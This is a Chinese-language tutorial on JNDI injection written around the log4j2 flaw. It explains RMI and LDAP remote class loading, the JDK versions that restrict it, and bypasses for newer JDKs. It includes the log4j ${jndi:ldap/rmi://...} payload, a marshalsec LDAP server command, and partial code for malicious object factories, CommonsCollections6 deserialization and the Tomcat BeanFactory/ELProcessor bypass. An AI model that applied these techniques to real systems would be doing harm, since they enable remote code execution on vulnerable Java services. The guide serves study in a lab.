JNDI入门
JNDI入门指北
前言
log4j2 宛如过年一般,趁此机会对没理清的 JNDI 协议仔细再捋一捋
log4j的payload很好记:${jndi:ldap/rmi://xxxxxx/exp}
那么,我们就需要研究一下是怎么来的。
首先来看rpc
RPC
RPC即 Remote Procedure Call
(远程过程调用),==是一种技术思想而并非一种规范的协议==,是一种通过网络从远程计算机请求服务的过程。
常见 RPC 技术和框架有:
- 应用级的服务框架:阿里的 Dubbo/Dubbox、Google gRPC、Spring Boot/Spring Cloud。
- 远程通信协议:RMI、Socket、SOAP(HTTP XML)、REST(HTTP JSON)。
- 通信框架:MINA 和 Netty。
一个rpc框架有以下必备条件:传输协议,序列化,注册中心,服务路由,负载均衡,IO框架,心跳机制,服务鉴权,服务隔离,服务治理,监控埋点。
- Dubbo:国内最早开源的 RPC 框架,由阿里巴巴公司开发并于 2011 年末对外开源,仅支持 Java 语言。
- Motan:微博内部使用的 RPC 框架,于 2016 年对外开源,仅支持 Java 语言。
- Tars:腾讯内部使用的 RPC 框架,于 2017 年对外开源,仅支持 C++ 语言。
- Spring Cloud:国外 Pivotal 公司 2014 年对外开源的 RPC 框架,仅支持 Java 语言
- gRPC:Google 于 2015 年对外开源的跨语言 RPC 框架,支持多种语言。
- Thrift:最初是由 Facebook 开发的内部系统跨语言的 RPC 框架,2007 年贡献给了 Apache 基金,成为 Apache 开源项目之一,支持多种语言。
联系
先直接给出结论
Spring Cloud是一种RPC框架,但是区别是它使用的是http协议的传输,整体技术和普通RPC如dubbo/thrift有很大区别,所以一般会分开说。
而Springcloud的核心是微服务,微服务中使用 RPC的思想尤为明显
我们熟知的一些漏洞,能够远程加载恶意类的,或多或少都有着使用微服务架构的影子,所以我们才需要对这一领域进行研究。
使用场景
在分布式场景中,我们一般要考虑调用问题
远程过程调用,要能够像本地过程调用一样方便,让使用者感受不到远程调用的逻辑
rpc的过程图
RPC:(Remote Procedure call) 即远程过程调用,它是一个计算机通信协议,RPC与语言无关
RMI:(Remote Method Invocation) 远程方法执行,是RPC的纯java实现方式
简单来说,就是一个节点请求另一个节点的服务
- 服务端需要暴露一个接口 (让客户端知道服务端有哪些可以请求的服务)
- 客户端需要把调用方法名,参数都传递到服务端
- 服务端接收客户端发来的方法名和参数,在自己的服务中找到对应的方法,然后去调用
- 服务器端把结果发送到客户端
通过网络传输字符串,对象等数据,使用时常伴随着序列化使用。
但是,光看这样,无法理解其中的细节,我们需要深入看一下RPC的架构
在一个典型 RPC 的使用场景中,包含了服务发现、负载、容错、网络传输、序列化等组件,其中“RPC 协议”就指明了程序如何进行网络传输和序列化。(这个在后面的demo中会介绍到)
微服务
参考文章:https://www.jianshu.com/p/7293b148028f
这里先谈一下微服务,什么是微服务
- 微服务是系统架构上的一个风格,主旨是将一个原本独立的系统拆分成多个小型服务
- 这些小服务能够在各自独立的进程中运行,服务之间通过HTTP的 Restful API进行通信协作。
比方说,一个服务里面,就有一个apache + database
,
被拆分成的每一个小型服务都围绕着系统中的某一项或一些耦合度较高的业务功能进行构建,并且每个服务都维护着自身的数据存储、业务开发、自动化测试案例以及独立部署机制。
为什么要使用微服务
微服务架构有别于更为传统的单体式方案,可将应用拆分成多个核心功能。==每个功能都被称为一项服务,可以单独构建和部署,这意味着各项服务在工作(和出现故障)时不会相互影响==。这有助于您更好实现 DevOps 的技术,让持续集成和持续交付(CI/CD)[软件构造的知识点]更加利于实现。
按照官方的说法,实施微服务需要有:服务组件化,按业务阻止团队,做产品的态度,==轻量化的通信机制==,去中心化处理数据,去中心化管理数据,基础设施自动化,容错测试,容错设计,演进式设计。
其中,我们攻击具有JNDI漏洞的业务时,大部分是从轻量化的通信机制中入手的。
这里以微服务 zookeeper为例,看一下微服务的过程
那么,我们伪造一个 微服务中间的服务器,类似于伪造JDBC反序列化漏洞中mysql服务端一样,让客户端访问恶意的服务器去加载数据,就可以达到我们的目的。
关于jdk版本的问题
师傅们经过测试,log4j给出了可以打的一些环境版本
总结是:rmi 113之前可以用, ldap 191之前可以用
1 | 8u112 rmi可以利用 |
那么,为什么191和113是一个分水岭呢?
我们先来分析一个例子
LDAP+JNDI远程加载恶意类
ldap的jndi在==6u211、7u201、8u191、11.0.1==后也将默认的com.sun.jndi.ldap.object.trustURLCodebase
设置为了false,并且这些变动对应的分配了一个漏洞编号CVE-2018-3149。
这就是为什么师傅们说到191之后就不再适用了,因为如果我们想要在191之后的版本进行使用ldap进行加载恶意类,需要我们手动去设置参数com.sun.jndi.ldap.object.trustURLCodebase
设置为true
具体可以见 Vulfocus 靶场环境
1 | docker pull vulfocus/log4j2-rce-2021-12-09:latest |
中有代码这么写道
使用 docker copy 命令将 demo.jar
拷贝到主机进行反编译
可以看到师傅在jdk版本不满足的情况下设置了属性为 true
接下来,我们以一张图来理清思路
JNDI
JNDI(Java Naming and Directory Interface)
是Java提供的Java 命名和目录接口
。通过调用JNDI
的API
应用程序可以定位资源和其他程序对象。JNDI
是Java EE
的重要部分,需要注意的是它并不只是包含了DataSource(JDBC 数据源)
,JNDI
可访问的现有的目录及服务有:JDBC
、LDAP
、RMI
、DNS
、NIS
、CORBA
。
JNDI如上很多协议,但是我们这里只分析 LDAP和RMI
LDAP目录服务
LDAP全称是轻量级目录访问协议。
LDAP的服务处理工厂类是:com.sun.jndi.ldap.LdapCtxFactory,连接LDAP之前需要配置好远程的LDAP服务。
RMI
RMI的流程中,客户端和服务端之间传递的是一些序列化后的对象,这些对象在反序列化时,就会去寻找类。如果某一端反序列化时发现一个对象,那么就会去自己的CLASSPATH下寻找想对应的类;如果在本地没有找到这个类,就会去远程加载codebase中的类。
远程加载恶意类(攻击服务端)
RMI服务端远程加载恶意类
根据p师傅知识星球的内容可知rmi进行加载的时候,会涉及到codebase
,codebase是一个地址,指定jvm
从哪个地方去搜集类,和ClassPath,jdbc的url一样,通常是远程的URL,比如http,ftp等
如果我们指定codebase=http://example.com
,然后加载org.vulhub.example.Example
类,则宿主机上的jvm将会去下载http://example.com/org.vulhub.example/Example.Class
,并作为要加载类的字节码。
在RMI的流程中,客户端和服务端之间传递的是一些序列化后的对象,这些对象在反序列化时,就会去寻找类。如果某一端反序列化时发现一个对象,那么就会去自己的CLASSPATH下寻找想对应的类;如果在本地没有找到这个类,就会去远程加载codebase中的类。
所以,我们只要控制了codebase
,就可以加载任何恶意类。
在RMI中,我们是可以将codebase
随着序列化的数据一起传输的,服务器在接受到数据后,就会去ClassPath和指定的codebase去寻找类。
满足条件
因此,官方在注意到后,在后面的版本加了限制,满足如下条件的才可以攻击
- 安装并配置了
SecurityManager
,(需要自己设置为trust) - java.rmi.server.useCodebaseOnly 配置为 flase,如果为 true,则将禁用自动加载类文件,不允许远程加载对象
java在6u45、7u21,8u121,开始java.rmi.server.useCodebaseOnly默认配置已经改为了true。
RMI+JNDI远程加载恶意类
最典型的是 fastjson rmi+jndi注入。
被引用的ObjectFactory对象还将受到com.sun.jndi.rmi.object.trustURLCodebase
配置限制,如果该值为false(不信任远程引用对象)则无法调用远程的引用对象。
rmi的jndi在6u132,7u122,8u113 开始
com.sun.jndi.rmi.object.trustURLCodebase
默认值已改为了false。
com.sun.jndi.rmi.object.trustURLCodebase
、com.sun.jndi.cosnaming.object.trustURLCodebase
的默认值变为false
LDAP+JNDI远程加载恶意类
还是 fastjson ldap+jndi注入
ldap的jndi在6u211、7u201、8u191、11.0.1后也将默认的
com.sun.jndi.ldap.object.trustURLCodebase
设置为了false
JNDI注入之 rmi+jndi
如果我们再RMI服务端绑定一个恶意的引用对象,RMI 客户端在获取服务端绑定的对象的时候,发现是一个Reference对象后,检查当前JVM是否允许 (基于 trustURLCodebase)加载远程引用的对象,如果允许加载 Reference且本地不存在对象工厂类,则使用 URLClassLoader 加载远程的jar,去加载我们构建的恶意对象工厂(ReferenceeObjectFactory)类,然后调用其中的getObjectInstance
方法从而触发方法中恶意RCE代码。
所以,如果当前RMI客户端允许加载远程调用的对象,且RMI服务端绑定的是Referrnce
恶意对象,则可以进行RMI攻击
服务端
上面也说到了,对于jdk版本过高的,需要手动开启trustURLCodebase=true
,不开启的话会提示The Object factory is untrusted
RMI
1 | 列举几个函数 |
服务端与注册中心
JRMP:客户端,服务端,注册中心三者之间的通信协议称为 JRMP协议
下面对一些常用的操作进行概括
服务端与注册中心
1 | Registry registry = LocateRegistry.getRegistry(1099); |
通过getRegistry
方法获取到的其实是一个RegistryImpl_Stub
的代理对象,其中封装了注册中心的一些TCP信息,用于与之发起请求
JNDI注入前置
客户端
JNDI有多种命名/目录提供的形式,所以客户端要IntialContext
类来获取初始目录环境
1 | String url = "rmi://localhost:1099/hello"; |
JNDI会根据 url 的形式来动态解析,比如对于以RMI形式提供的服务,url就可以写成rmi://{ip}:{port}/{name}
;对于LDAP的服务,url就可以写成 ldap://{ip}:{port}/{name}
JNDI注入的根–Reference
Reference:在JNDI服务中允许使用系统以外的对象,比如在某些目录服务中直接引用远程的Java对象,但遵循一些安全限制
对于不存在命令/目录范围内的对象,可以通过 Reference类来绑定一个外部的远程连接对象(一般以字节码形式通过http服务托管),客户端可以通过lookup方法找到这个远程对象,获取相应的factory,然后通过factory将 reference转化成对象。
JNDI允许通过对象工厂(java.naming.spi.ObjectFactory)动态加载对象实现,例如,当查找绑定在名称空间中的打印机时,如果打印服务将打印机的名称绑定到Reference
,则可以使用该打印机 Reference创建一个打印机对象,从而查找的调用者可以在查找后直接在该打印机对象上操作。
==对象工厂必须实现 javax.naming.spi.ObjectFactory 接口,并且重写 getObjectInstance方法==
所以我们这里就可以自己实现一个OjbectFactory接口的类,并重写getObjectInstance方法
1 | public class ReferenceObjectFactory implements ObjectFactory { |
主要原理:JNDI Reference 远程加载Object Factory类的特性
1 | Reference(String name) |
通过RMI来绑定一个Reference对象
1 | import com.sun.jndi.rmi.registry.ReferenceWrapper; |
为什么需要
ReferenceWrapper
包装呢?被Registry绑定的对象必须继承UnicastRemoteObject类,而Reference类并没有实现这个类,所以无法被直接绑定
JNDI注入8u191↓
通常JNDI注入攻击都是 lookup方法的执行者,一般步骤如下:
- 目标机器调用了
InitialContext.lookup("URL")
,且URL为用户可控 - 攻击者控制这个URL为一个恶意的RMI服务地址:
rmi://{ip}/{port}/name
- 恶意RMI服务会返回一个含有恶意factory的Reference对象
- 目标获取Reference之后会动态加载factory
- 攻击者可以在恶意factory的静态代码块,构造方法写入恶意代码,在目标实例化factory的时候被RCE
当然,通常会有两种实现方式:LDAP和RMI
RMI(8u121)
我们先创建一个恶意的类,让服务器托管这个恶意的类
1 | import java.io.IOException; |
使用javac进行编译,放置于服务器
这里要注意一下,要用低版本的jdk进行编译,如果用高版本jdk编译会出现如下问题
当我换了jdk进行编译(jdk版本更换工具推荐 jevn)
然后编写Server端的代码
1 | import com.sun.jndi.rmi.registry.ReferenceWrapper; |
编写客户端代码
1 | import javax.naming.InitialContext; |
如果客户端lookup方法参数可控的话,命令就可以执行成功,可以被RCE
分析
在此处打上断点进行调试
前几步是从Server端解析传入的URL,到 这一步 RegistryContexr#lookup的方法,
我们可以看到this.registry
仍然是RegistryImpl_Stub
,执行lookup
方法获取的是一个ReferenceWrapper_Stub
对象,
在RegistryContext#decodeObject
方法中会根据这个ReferenceWrapper_Stub对象获取Reference对象
跟进getReference方法,发现调用了UnicastRef#invoke ⽅法
相当于进⾏了⼀次远程⽅法调⽤(⻅ RMI 中 的 “Client 发送请求”),⽽调⽤的⽅法为
正好对应着 RMI 服务端中的 ReferenceWrapper#getReference ⽅法(ReferenceWrapper 实现了 RemoteReference 接⼝):
于是这次远程⽅法调⽤的结果就是返回了远程 ReferenceWrpper 包装的 Reference 对象:
(条件运算符前面成立,返回前面得表达式)
继续跟代码,来到 NamingManager#getObjectInstance ⽅法,跟到 NamingManager##getObjectFactoryFromReference
方法获取factory实例
跟了以后发现,首先进行本地加载,加载失败以后,再从codebase加载factory
其中,下面的LoadClass加载方式为 URLClassLoader,成功加载了恶意代码
最后返回factory实例
修复
在 8U121之后,默认的RMI利用方式不再信任codebase
我这里以 8u181为例
在RegistryContext#<static>
(末尾处)新增代码
在 RegistryContext#decodeObject
处
LDAP方式
与RMI方式一样,使用marshalsec开启ldap服务
1 | java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalec.jndi.LDAPRefServer http://127.0.0.1:8000/#Exp |
简单分析
1 | getObjectFactoryFromReference:142, NamingManager (javax.naming.spi) |
最后仍然是调⽤了 NamingManager#getObjectFactoryFromReference ⽅法。
修复
8u281版本
同上,跟到NamingManager##getObjectFactoryFromReference 方法的loadClass进去之后,会判断trustURLCodebase,长按ctrl+左键
会跳到 VersionHelper12
中,这个类默认将其定位 false
JNDI注入 8u191↑
高版本的绕过思路有两种:
- LDAP Server直接返回恶意序列化数据,但是需要目标环境存在Gadget依赖
- 使用本地的Factory绕过(主要利用了
org.apache.naming.factory.BeanFactory
类)
直接返回序列化数据(LDAP)
LDAP Server可以直接改参考marshalsec,修改里面的内容
1 | package demo2; |
其中的Utils类为创建一个模板类,然后设置其属性,其实还是CC链那一套,为了避免冗杂,另分开写
1 | package demo2.utils; |
其他注意事项
执行的恶意类模块必须放在 static里面执行,放在main函数里面是执行不了的。
1 | package demo2; |
分析
本质上虽然是利用了LDAP,但是实际上却是利用了序列化的数据。
先看调用链
注:我一开始使用的版本是 8u282,调的时候总感觉有些问题,和师傅们调的不一样,后来换了8u202好点了。虽然8u282也能顺下来,但因为jdk版本升级,底层变动,其实路子还是相对比较复杂了。因为8u282调的时候,一开始不是lookup方法,所以比较难理解。人生建议选择低版本jdk,否则回怀疑人生
1 | (ObjectInputStream#readObject --> ... --> Runtime.getRuntime.exec('calc')) |
在其中的JAVA_ATTRIBUTES
中,我们可以看到其定义
1 | static final String[] JAVA_ATTRIBUTES = new String[]{"objectClass", "javaSerializedData", "javaClassName", "javaFactory", "javaCodeBase", "javaReferenceAddress", "javaClassNames", "javaRemoteLocation"}; |
这里的var0
是LDAP服务器端发送给Attributes
(我们可控),所以我们可以在服务器端把这个属性与恶意的类进行绑定
在我们构造的LDAPServer中,我们把JAVA_Attributes
中的javaSerializeData
进行一个绑定。
1 | e.addAttribute("javaSerializedData", getCommonsCollections6()); |
然后进行直接进行反序列化。
本地Factory绕过(RMI)
==稍微有些苛刻==
在 Reference 类中的 factory Class,要求实现 ObjectFactory 接⼝,
在 “NamingManager#getObjectFactoryFromReference” ⽅法中的逻辑是这样的:
- 优先本地加载factory,这就要求factoryClass在 本地的Classpath中
- 本地加载不会从codebase中加载,但是由于⾼版本 jdk 默认不信任 codebase,在⼀般情况 下⽆法利⽤
- 在加载完 factory 之后会强制类型转换为 javax.naming.spi.ObjectFactory 接⼝类型, 之后调⽤ factory.getObjectInstance() ⽅法
所以,如果找可以利用的factory就满足以下要求:
- 在目标的ClassPath中,且实现了 javax.naming.spi.ObjectFactory 接⼝
- 其 getObjectInstance ⽅法可以被利⽤
这个可⽤的 factory 类为 org.apache.naming.BeanFactory ,位于 tomcat 的依赖包中,此 外,这个 factory 绕过需要搭配 javax.el.ELProcessor 来完成 RCE,依赖:
1 | <dependency><groupId>org.apache.tomcat</groupId><artifactId>tomcat-catalina</artifactId><version>8.5.0</version></dependency><!-- 加载ELProcessor时需要 --><dependency><groupId>org.apache.tomcat.embed</groupId><artifactId>tomcat-embed-el</artifactId><version>8.5.0</version></dependency> |
分析
来到BeanFactory#getObjectInstance
方法中,(太长省略)
这里的代码逻辑比较复杂,简单可以概括为以下几点:
BeanFactory#getObjectInstance
要求传入Referrnce必须为ResourceRef
的实例BeanFactory
通过反射创建了一个bean,这个Bean的类名,属性,属性值都来自于Reference
,我们可控。- 在注入Bean的属性的时候,会调用对应的setter方法。这个setter方法不一定要是
set...
,我们通过ResourceRef
对象中的forceString
,可以把任意的public
方法转换为该属性的setter
方法。 - 这个方法的参数类型必须是
String.class
我们可以利用的方法为javax.el.ELProceor#eval
方法,可以执行任意EL表达式
1 | package demo03; |
1 | package demo03; |